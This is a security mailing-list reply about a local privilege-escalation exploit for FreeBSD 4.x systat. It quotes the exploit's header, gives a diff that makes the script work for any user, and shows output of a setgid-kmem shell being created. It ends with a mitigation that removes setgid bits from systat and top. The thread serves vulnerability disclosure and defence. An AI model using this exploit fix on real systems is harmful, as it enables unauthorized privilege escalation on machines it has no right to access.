Re: FreeBSD 4.x systat exploit

[Steve Reid <sreid () SEA-TO-SKY NET>]

On Tue, Oct 10, 2000 at 02:52:17PM +0200, Przemyslaw Frasunek wrote:
> #!/bin/csh
>
> # (c) 2000 Przemys?aw Frasunek <venglin () freebsd lublin pl>
> #
> # FreeBSD 4.x systat gid=kmem exploit
> # Idea by: Jouko Pynnönen <jouko () SOLUTIONS FI>
> #
> # Dedicated to ksm.
[etc]

It doesn't work as posted. But that doesn't mean systat is safe, it
just means you aren't "venglin":

--- exploit.csh.orig    Tue Oct 10 17:42:49 2000
+++ exploit.csh Tue Oct 10 17:46:53 2000
@@ -11,7 +11,7 @@
 #!/bin/csh

 cp /bin/csh /tmp
-/usr/sbin/chown venglin.kmem /tmp/csh
+chgrp kmem /tmp/csh
 chmod 2755 /tmp/csh
 __EOF__

And now it works:
steve@grok:/home/steve% ./exploit.csh
-rwxr-sr-x  1 steve  kmem  622908 Oct 10 18:15 /tmp/csh
steve@grok:/home/steve% uname -srm
FreeBSD 4.1-RELEASE i386

BTW, /usr/bin/top is also linked to ncurses. I don't know if it's
vunlerable or not (the exploit does nothing to top in my limited
testing) but it might be prudent to remove the setgid bit from it too.

chmod a-s /usr/bin/systat /usr/bin/top